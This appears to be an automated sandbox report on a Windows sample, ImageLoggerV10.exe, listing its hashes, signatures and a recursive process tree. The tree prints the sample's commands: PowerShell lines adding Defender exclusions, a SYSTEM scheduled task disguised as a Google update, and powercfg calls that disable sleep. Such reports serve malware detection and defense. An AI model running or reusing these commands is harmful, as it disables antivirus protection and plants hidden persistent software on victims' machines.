ce624e9867ec05cf821f97237fb9ac43eb4142e942bc2b56599f64e1e5b48d66

Resubmissions

15/08/2023, 18:14

230815-wvml1aeh3s 3

15/08/2023, 18:05

230815-wn7nlacg48 3

Analysis

max time kernel
3s
max time network
84s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
15/08/2023, 18:14

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ImageLoggerV10.exe
Size

63.7MB
MD5

f50a12d488c7affe7fe04837f70330e4
SHA1

6395e04ffe80246774e035f2d77165da9a79f011
SHA256

ce624e9867ec05cf821f97237fb9ac43eb4142e942bc2b56599f64e1e5b48d66
SHA512

88f6a21b96b96d07c8ea22453bb6a6a5c9fd504ecc26bb0f0da3f4faf18c9a78c44c61748209d9830046a1f53eb837a123051bcd164fca037a3d46660f3b8b3a
SSDEEP

1572864:6FU04u+iHMm7u5Ud9ukp+beRpvKvRvNmq4DnRurKaATPsyiAodPkxSa:6n4/cwUdL+UHiAodPkxS

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
6696	5220	WerFault.exe	160
6232	4364	WerFault.exe	141
6688	3184	WerFault.exe	107
6744	6288	WerFault.exe	171

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 4432 wrote to memory of 4600	4432	ImageLoggerV10.exe	81
PID 4432 wrote to memory of 4600	4432	ImageLoggerV10.exe	81
PID 4432 wrote to memory of 4600	4432	ImageLoggerV10.exe	81

C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4432
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
  2⤵
  PID:4600
- C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
  "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
    3⤵
    PID:2456
- - C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
    "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
    3⤵
    PID:1456
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
      4⤵
      PID:4932
  - - C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
      "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
      4⤵
      PID:504
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        5⤵
        
        PID:1640
    - - C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        5⤵
        
        PID:2924
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        6⤵
        
        PID:456
      - C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        6⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        7⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        7⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        8⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        8⤵
        
        PID:3104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        9⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 2440
        10⤵
        Program crash
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        9⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        10⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        10⤵
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        11⤵
        
        PID:508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        12⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        12⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        13⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        13⤵
        
        PID:664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        14⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3636" "2268" "2236" "2272" "0" "0" "2276" "0" "0" "0" "0" "0"
        15⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        14⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        15⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4484" "2176" "2152" "2180" "0" "0" "2184" "0" "0" "0" "0" "0"
        16⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        15⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        16⤵
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        16⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        17⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        18⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        18⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        19⤵
        
        PID:6288
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6288 -s 996
        20⤵
        Program crash
        
        PID:6744
        
        C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV10.exe"
        19⤵
        
        PID:6404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        20⤵
        
        PID:6988
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        18⤵
        
        PID:5920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        17⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1772
        18⤵
        Program crash
        
        PID:6696
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        17⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        16⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        15⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        14⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        13⤵
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        12⤵
        
        PID:564
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        11⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBsACMAPgA="
        11⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        10⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        9⤵
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        8⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        7⤵
        
        PID:4880
      - C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        6⤵
        
        PID:2368
    - - C:\Users\Admin\AppData\Local\Temp\dll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll.exe"
        5⤵
        
        PID:4604
  - - C:\Users\Admin\AppData\Local\Temp\dll.exe
      "C:\Users\Admin\AppData\Local\Temp\dll.exe"
      4⤵
      PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4364
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4364 -s 1976
  2⤵
  - Program crash
  PID:6232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:6812

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:6804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:5824

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 476 -p 4364 -ip 4364
1⤵
PID:5628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:6504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6404 -ip 6404
1⤵
PID:6552

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:6464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3184 -ip 3184
1⤵
PID:6440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5220 -ip 5220
1⤵
PID:6620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6288 -ip 6288
1⤵
PID:6380

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:6300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
